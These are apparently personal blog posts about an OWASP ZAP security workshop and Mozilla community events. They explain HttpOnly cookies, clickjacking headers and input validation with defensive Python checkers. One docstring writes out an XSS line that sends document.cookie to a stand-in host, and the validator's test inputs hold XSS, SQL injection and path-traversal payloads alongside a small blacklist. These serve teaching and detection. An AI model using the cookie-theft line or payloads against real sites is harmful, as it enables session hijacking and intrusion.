Sunday 23 August 2015

Securing Web @ZAP Day-4

I started the fourth day's session by introducing new technical terms and discussing the worksheet that had been given on day 3. The worksheet covers web application security as well as the ZAP source code.

In this session we introduced the main functions in ZAP as well as the packages they are located in.
I gave a short talk on the ZAP API and how to access it, on curl, a command-line tool for transferring data to or from a server, and on the HttpOnly cookie flag, which keeps client-side script from reading a cookie, so that malicious code injected into our website cannot send the cookie from our website to the attacker's website.
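
As an added example (not code from this post or from ZAP itself), here is a small Python check in the spirit of a ZAP passive-scan rule: it parses the Set-Cookie headers of a constructed HTTP response and reports every cookie that lacks HttpOnly (or Secure when served over HTTPS), and builds the hardened form of such a header. The cookie names and values are made up.

```python
"""Flag cookies set without HttpOnly (or Secure) in HTTP response headers.

Added example in the spirit of a ZAP passive-scan rule; not ZAP's own code.
The sample headers below are constructed, not captured from a real site.
"""
from dataclasses import dataclass
from typing import List, Set, Tuple


@dataclass
class CookieFinding:
    name: str                      # cookie name as sent by the server
    missing: Tuple[str, ...]       # flags that should have been present


def parse_set_cookie(value: str) -> Tuple[str, Set[str]]:
    """Split one Set-Cookie value into (cookie name, lower-cased attribute names)."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return name, attrs


def check_cookies(headers: List[Tuple[str, str]], over_https: bool = True) -> List[CookieFinding]:
    """Return one finding per cookie lacking HttpOnly (and Secure when served over HTTPS).

    Without HttpOnly, script injected through XSS can read document.cookie and
    ship it off-site, e.g.  new Image().src = "https://evil.example/?c=" + document.cookie
    """
    findings = []
    for header, value in headers:
        if header.lower() != "set-cookie":
            continue
        name, attrs = parse_set_cookie(value)
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if over_https and "secure" not in attrs:
            missing.append("Secure")
        if missing:
            findings.append(CookieFinding(name, tuple(missing)))
    return findings


def hardened_set_cookie(name: str, value: str, path: str = "/") -> str:
    """Build a Set-Cookie value carrying the flags a session cookie should have."""
    return f"{name}={value}; Path={path}; HttpOnly; Secure; SameSite=Lax"


# Constructed sample response: cookie names and values are made up
SAMPLE_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "JSESSIONID=1A2B3C; Path=/; HttpOnly; Secure"),
    ("Set-Cookie", "b_id=42; Path=/"),                 # neither flag
    ("Set-Cookie", "theme=dark; Path=/; HttpOnly"),    # no Secure
]

if __name__ == "__main__":
    for f in check_cookies(SAMPLE_HEADERS):
        print(f"cookie {f.name!r} is missing: {', '.join(f.missing)}")
    print(hardened_set_cookie("JSESSIONID", "1A2B3C"))
```

The check is deliberately header-only: it needs no browser, which is why ZAP can run this kind of rule passively on every response that passes through its proxy.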

Later we introduced the Saros plugin, a collaboration tool for the Eclipse IDE. It is essential for a team working on a single project, so that all members stay in sync with the modifications made while working together in real time.

Saros is a very useful application with features such as chat with team members and a view of what the other users working on the project are currently doing.

Sumanth later shared some knowledge about the user interface modules of the ZAP tool. He explained how the packages are split in the ZAP source, so that you do not have to search for them through all the files, which is a heck of a long procedure, by the way!

Later Sanjay and I explained Swing Explorer, an open source tool that works on any Swing-based application to explore Swing elements like windows, frames, buttons and a few other components visually; you can browse the whole component hierarchy. We also showed how to add new tabs at different positions of the ZAP user interface, such as left, right, footer, etc.


I later introduced The BodgeIt Store, a deliberately vulnerable web application developed for newcomers to practise penetration testing.
The BodgeIt Store contains vulnerabilities such as:
1. Cross Site Scripting
2. SQL injection
3. Hidden (unprotected) content
4. Cross Site Request Forgery
5. Debug code
6. Insecure Object References
7. Application logic vulnerabilities

Monday 17 August 2015

Securing Web @ZAP Day-3


The third day of the ZAP workshop started on time at the Collab House, and I started taking pics as I was feeling a little bored. After some time Sumanth Damarla started the workshop with a discussion of the Day-2 worksheet, where he briefly explained the important key terms in the worksheet.

Key Terms:
-> Clickjacking
-> X-Frame-Options
-> Port 80 & Port 443
-> HTTP & HTTPS
-> Privilege escalation
-> Third-party API function
-> Input Validation
-> Whitelisting
-> Blacklisting

1) Clickjacking is a malicious technique of tricking a web user into clicking on something different from what they perceive they are clicking on (for example a transparent frame of the target site laid over a harmless-looking page), thus potentially revealing confidential information or performing actions on the user's behalf while they click on seemingly innocuous web pages.

2) X-Frame-Options is a response header that offers partial protection against clickjacking. There are three possible values:
-> DENY: the page cannot be displayed in a frame, regardless of the site attempting to do so.
-> SAMEORIGIN: the page can only be displayed in a frame on the same origin as the page itself.
-> ALLOW-FROM uri: the page can only be displayed in a frame on the specified origin. This value was never supported by all browsers; the Content-Security-Policy frame-ancestors directive is the standard replacement and, where present, overrides X-Frame-Options.
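
An added Python example (not code from the worksheet or from ZAP) that evaluates the framing headers of a constructed response the way a passive scanner would: it applies the three X-Frame-Options values above, lets a Content-Security-Policy frame-ancestors directive take precedence, and treats a misspelt value as no protection, since browsers ignore values they do not recognise. The host names in it are made up.

```python
"""Decide whether a response still allows framing (clickjacking exposure).

Added example, not ZAP's own passive-scan rule. Headers below are constructed.
Precedence follows the browsers: a Content-Security-Policy frame-ancestors
directive, when present, overrides X-Frame-Options.
"""
from typing import List, Optional, Tuple

Headers = List[Tuple[str, str]]


def first_header(headers: Headers, name: str) -> Optional[str]:
    """Case-insensitive lookup of the first header with the given name."""
    for h, v in headers:
        if h.lower() == name.lower():
            return v
    return None


def frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the frame-ancestors source list from a CSP value, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.strip("'").lower() for t in tokens[1:]]
    return None


def framing_policy(headers: Headers) -> str:
    """Summarise the effective framing policy.

    Returns 'deny', 'sameorigin', 'allow-from:<uri>', 'csp:<sources>',
    'invalid:<value>' (browsers ignore malformed X-Frame-Options) or 'unprotected'.
    """
    csp = first_header(headers, "Content-Security-Policy")
    if csp is not None:
        sources = frame_ancestors(csp)
        if sources == ["none"]:
            return "deny"
        if sources == ["self"]:
            return "sameorigin"
        if sources:
            return "csp:" + " ".join(sources)

    xfo = first_header(headers, "X-Frame-Options")
    if xfo is None:
        return "unprotected"
    value = " ".join(xfo.split()).lower()   # normalise case and whitespace
    if value in ("deny", "sameorigin"):
        return value
    if value.startswith("allow-from "):
        return "allow-from:" + value[len("allow-from "):]
    return "invalid:" + value


def clickjacking_risk(headers: Headers) -> str:
    """'high' when any site can frame the page, 'weak' for ALLOW-FROM
    (never supported by all browsers), 'none' otherwise."""
    policy = framing_policy(headers)
    if policy == "unprotected" or policy.startswith("invalid:"):
        return "high"
    if policy.startswith("allow-from:"):
        return "weak"
    return "none"


# Constructed responses; host names are made up
SAMPLES = {
    "deny":     [("X-Frame-Options", "DENY")],
    "same":     [("X-Frame-Options", "SAMEORIGIN")],
    "partner":  [("X-Frame-Options", "ALLOW-FROM https://partner.example")],
    "csp_wins": [("X-Frame-Options", "SAMEORIGIN"),
                 ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'")],
    "typo":     [("X-Frame-Options", "SAME-ORIGIN")],   # not a valid value
    "none":     [("Content-Type", "text/html")],
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(f"{label:9} {framing_policy(hdrs):35} risk={clickjacking_risk(hdrs)}")
```

The "typo" sample is the case worth remembering: a header that is present but misspelt gives the same protection as no header at all, and a scanner that only tests for the header's presence will miss it.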

3) Port 80 & Port 443:
-> Port 80 is the default port on which a web server listens for HTTP requests from a web client, assuming the default was kept when the server was configured.
-> Port 443 is the default port for HTTPS (HTTP over SSL/TLS). Since the TLS session is opaque to outsiders, firewalls cannot see what is going on inside it and cannot do transparent proxying of the content.


4) HTTP & HTTPS:

-> Hypertext Transfer Protocol (HTTP) is the protocol used to fetch web pages. When you type a web address into your web browser, your browser acts as a client, and the computer holding the requested information acts as a server.
-> Hypertext Transfer Protocol Secure (HTTPS) is the secure version of HTTP, the protocol over which data is sent between your browser and the website you are connected to. The 'S' at the end of HTTPS stands for 'Secure': all communication between your browser and the website is encrypted, and the server's identity is authenticated by its certificate.

5) Privilege escalation is used to gain elevated access to resources that are normally protected from an application or user. The result is an application or user with more privileges than intended.
        
6) Third-party API function: the idea behind developing applications with third-party APIs is that it is often easier to use someone else's service than to spend your own time developing a product. Third-party providers can grant you permission to execute many different operations through their service.
7) Input validation can be used to detect unauthorized input before it is processed by the application.
-> A whitelist (now also called an allowlist) tests the input against a list of known-good values or patterns. To do this you compile a list of all the good input values or conditions, then verify that the input received IS one of these correct conditions.
-> A blacklist (blocklist) tests the input against a list of known-bad values. You compile a listing of all the negative or bad conditions, then verify that the input received is NOT one of them. Blacklists are only as complete as the attacker's imagination: a variant, encoding or case change the list has not seen passes straight through, so a whitelist is the safer default.
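
The difference is easiest to see by running both kinds of validator over the same inputs. The following is an added Python example, not part of the worksheet: a blacklist that knows three attack fragments next to a whitelist that describes exactly what a valid username looks like, evaluated against constructed inputs.

```python
"""Whitelist (allowlist) versus blacklist (blocklist) input validation.

Added example, not from the original worksheet. Inputs are constructed.
The validated field is a username, so the whitelist describes exactly
what a valid username looks like; the blacklist only knows a few attack
fragments and is bypassed by any variant it has not seen.
"""
import re
from typing import Callable, List, Tuple

# Blacklist: reject anything containing a known-bad fragment
BLOCKED_FRAGMENTS = ("<script", "javascript:", "onerror=")


def blocklist_ok(value: str) -> bool:
    low = value.lower()
    return not any(bad in low for bad in BLOCKED_FRAGMENTS)


# Whitelist: 3-16 chars, starts with a letter, then letters/digits/underscore
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,15}")


def allowlist_ok(value: str) -> bool:
    return USERNAME_RE.fullmatch(value) is not None


# Constructed test inputs with the verdict a correct validator should give
SAMPLES: List[Tuple[str, bool]] = [
    ("alice_01", True),
    ("bob", True),
    ("<script>alert(1)</script>", False),
    ("<svg onload=alert(1)>", False),     # XSS variant not in the blacklist
    ("' OR 1=1--", False),                # SQL injection, never in a username
    ("../../etc/passwd", False),          # path traversal
]


def mismatches(check: Callable[[str], bool]) -> List[str]:
    """Inputs on which the given validator disagrees with the expected verdict."""
    return [value for value, expected in SAMPLES if check(value) != expected]


if __name__ == "__main__":
    print("blacklist misses:", mismatches(blocklist_ok))
    print("whitelist misses:", mismatches(allowlist_ok))
```

Every input the blacklist lets through is one whose attack fragment it simply did not list; the whitelist needs no knowledge of attacks at all, because anything that is not a username is rejected.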

After that we all had a 10-minute break and started tweeting about the ZAP event on Twitter. Then I talked about the ZAP API UI and the OWASP Summer Code Sprint 2015.

About it: The OWASP Summer Code Sprint 2015 is a program that aims to give students incentives to contribute to OWASP projects. By participating in the OWASP Summer Code Sprint a student gets real-life experience while contributing to an open source project. A student who successfully completes the program receives $1500 in total.

Follow this link- https://www.owasp.org/index.php/Summer_Code_Sprint2015

Setting up the ZAP environment in Eclipse.


ZAP environment setup:
Sanjay Gouri, Sumanth and I helped the participants install ZAP on their laptops. Of course we faced a few technical problems, but in the end we successfully set up the ZAP environment on all the laptops.


Another break, for half an hour, and then we played OWASP Snakes & Ladders.


About it: Snakes & Ladders is an educational project. It uses gamification to promote awareness of application security controls and risks, and in particular knowledge of other OWASP documents and tools.

Game Time:
We started with six players, all throwing the dice one by one to decide who should start the game. There was also a crazy thing going on while we were playing: tweeting about it on Twitter. So it was a game with a tweet.


After that we all had a group pic with Snakes & Ladders.



Securing Web @ZAP Day-2

On the second day of the workshop we installed the ZAP software and taught the participants about its user interface. After installing ZAP we took a session on generating ZAP's dynamic SSL certificate (the root CA certificate ZAP signs its per-site certificates with) and installing it in the Firefox browser. With that certificate trusted by the browser and the browser pointed at ZAP as its proxy, ZAP can intercept and inspect HTTPS traffic as well, which is what manual testing of websites for vulnerabilities relies on.

Later I explained the modes of the ZAP tool, which govern what actions ZAP is allowed to perform against a target while finding vulnerabilities: Safe mode, Protected mode, Standard mode and Attack mode.


I gave a demo of using ZAP in standard mode, attacking a test site and showing vulnerabilities such as XSS (cross site scripting) and others.
I also explained many features of the ZAP tool, such as intercepting, fuzzing, spiders and scanners.


On day two we covered many important concepts, like:

  • UI
  • Intercepting
  • Fuzzing concepts
  • Proxy concepts
  • Testing web applications
Finally the workshop ended with a worksheet containing many questions related to network security and vulnerabilities.

FirefoxOS App Day@VNRVJIET

Hello guys…..
We are here with an amazing Mozilla event that happened in the city, aimed at developing web apps for Firefox OS. We conducted a one-day Firefox OS app development session at one of the top engineering colleges in Hyderabad. Here we go with the commencement of the event…..






The event was held on 2nd March 2015 from 10:00 am to 4:00 pm. The organizers actively participated in taking the event forward. Around 80 enthusiastic participants, all really interested in developing applications, attended the event.
The team (Sumanth, Akshay, Sudarshan (myself), Sanjay) did a great job in delivering the content and helping the participants with app development. Thank you!!





AGENDA :
10:00 am – 10:30 am INTRODUCTION TO OPEN SOURCE CULTURE
10:30 am – 11:00 am INTRODUCTION TO MOZILLA AND ITS PROJECTS
11:00 am – 11:30 am BRIEF INTRODUCTION ON FIREFOX OS APP DEVELOPMENT
11:30 am – 11:45 am INTRODUCTION TO APP MAKER
11:45 am – 12:30 pm LUNCH BREAK
12:30 pm – 03:15 pm PARTICIPANTS DEVELOPING THEIR APPLICATIONS
03:15 pm – 04:00 pm DEMOS BY PARTICIPANTS AND SWAG DISTRIBUTION
It was a great workshop. It educated the participants about open source culture and Mozilla's principles, and we taught app development for Firefox OS. This was a kickstart for all the beginners: a hands-on session, which helped the novices. All the participants were very happy about the workshop, and the organizers received a few replies from the participants about the session.

 




Participant feedback:
#1
Today's workshop was totally very interesting and very useful, not only to computer science people but also to those who are interested in creating new apps.. It's time to create one's own app.. The basics we learned in this workshop were quite interesting, and we hope these workshops will really be very helpful to us. And I'm really thankful to those who are conducting these workshops, so that we can learn from our 1st year onwards and we can give our best. Special thanks to our seniors and the respective members of Mozilla Firefox for your valuable workshop….
#2
Being a first year student,
honestly I didn't know anything about HTML.
I just had some knowledge from school, so it was a bit helpful. I learnt that creating apps in an open source OS is not really that hard. All you've got to have is some new thought. So on the whole I would say it was technically a bit confusing to me because of my standards, but by the end of the day I was able to create a small app with a coloured background with pics and links, and I felt happy about that.. And many more….
Participants were looking forward to many more advanced workshops from the Mozilla team.
Our hospitality team at the college presented a plant to the Mozilla team, which we are going to plant on the campus on behalf of Mozilla…..!! #gogreen

Mozilla was pleased to be Knowledge Partner for the Reboot conference, which was aimed at students who come together to experience the secret of self-motivation, learn crucial entrepreneurial skills and discover opportunities.
We had a gathering of 150 students at the conference. Mozilla took the initiative to spread the word about open source culture. I took the opportunity to raise awareness among the participants about open source, the Mozilla mission, the Mozilla Manifesto and how Mozilla strives to build and safeguard the open web.
The Mozilla session started at 2:00 PM. I presented a few videos and slides covering the topics:
  • The Web We Want : An Open Letter.
  • Mozilla Manifesto.
  • Contribution opportunities at Mozilla
  • The Webmaker Project.
  • Firefox for Android.

The day ended with swag distribution and a foxy groupfie B|
Special thanks to Sumanth and Sanjay for helping me with organizing and running the event. :)
Here are a few moments captured at Reboot….